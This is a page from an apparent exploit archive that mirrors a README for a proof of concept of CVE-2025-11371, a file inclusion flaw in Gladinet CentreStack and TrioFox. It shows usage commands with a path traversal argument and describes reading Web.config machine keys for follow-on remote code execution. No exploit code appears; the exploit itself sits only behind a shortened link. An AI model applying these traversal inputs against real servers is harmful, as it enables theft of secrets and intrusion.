Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-11371 PoC — Gladinet CentreStack and TrioFox Local File Inclusion Flaw

Source
Associated Vulnerability
Title:Gladinet CentreStack and TrioFox Local File Inclusion Flaw (CVE-2025-11371)
Description:In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.  This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Readme
# CVE-2025-11371

### Overview
This repository contains a proof-of-concept exploit for CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability in Gladinet CentreStack and TrioFox. The exploit allows remote retrieval of sensitive system files, such as the Web.config, which can expose machine keys leading to further RCE via deserialization flaws like CVE-2025-30406.

Affected versions: All versions up to and including 16.7.10368.56560.  


### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
The vulnerability stems from improper input validation in the UploadDownloadProxy component's temp handler. The exploit crafts a specially formed request to the endpoint, appending traversal sequences to reach outside the web root.

### Proof of Concept
Tested against a default CentreStack setup on Windows Server 2019. Successful file reads include:
- Web.config (machine key disclosure)
- Machine.config
- Sensitive logs in %PROGRAMDATA%

### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-11371 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC Exploit - [href](https://tinyurl.com/ywabn2vc)

For any inquiries, please email me at: eviedejesu803@gmail.com

File Snapshot

[4.0K] /data/pocs/abb7308574269acbd3c8688a0a2d0dfdaf2b9c5d └── [1.9K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →